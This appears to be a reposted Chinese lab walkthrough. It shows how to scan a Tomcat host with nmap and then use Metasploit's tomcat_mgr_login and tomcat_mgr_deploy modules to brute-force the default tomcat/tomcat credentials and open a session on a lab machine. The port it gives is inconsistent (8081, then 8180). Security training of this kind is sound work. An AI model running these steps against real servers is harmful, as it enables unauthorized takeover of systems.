Metasploit爆破Tomcat弱口令

Metasploit爆破Tomcat弱口令

    实验步骤:
        1) 利用枚举的方法破解Tomcat的弱口令。

    实验步骤:
    
    一、利用nmap工具扫描目标主机
        1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。
        1.2 在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。
        1.3 在终端中输入命令“msfconsole”,启动MSF终端。
        1.4 在终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷。
        1.5 在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
        1.6 在终端下输入“set RHOSTS 192.168.1.3”,设置攻击目标主机IP。
        1.7 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号。
        1.8 在终端下输入“exploit”, 实施攻击。获得用户名tomcat,密码tomcat。
        1.9 在终端下输入“use exploit/multi/http/tomcat_mgr_deploy”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
        1.10 在终端下输入“set RHOST 192.168.1.3”,设置攻击的目标主机IP。
        1.11 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号。
        1.12 在终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat。
        1.13 在终端下输入“set password tomcat”,设置攻击时使用的密码tomcat。

        1.14 在终端下输入“exploit”,开始攻击,建立会话。



转自https://blog.csdn.net/smithjackhack/article/details/78563553

猜你喜欢

转载自blog.csdn.net/czmchen/article/details/80431289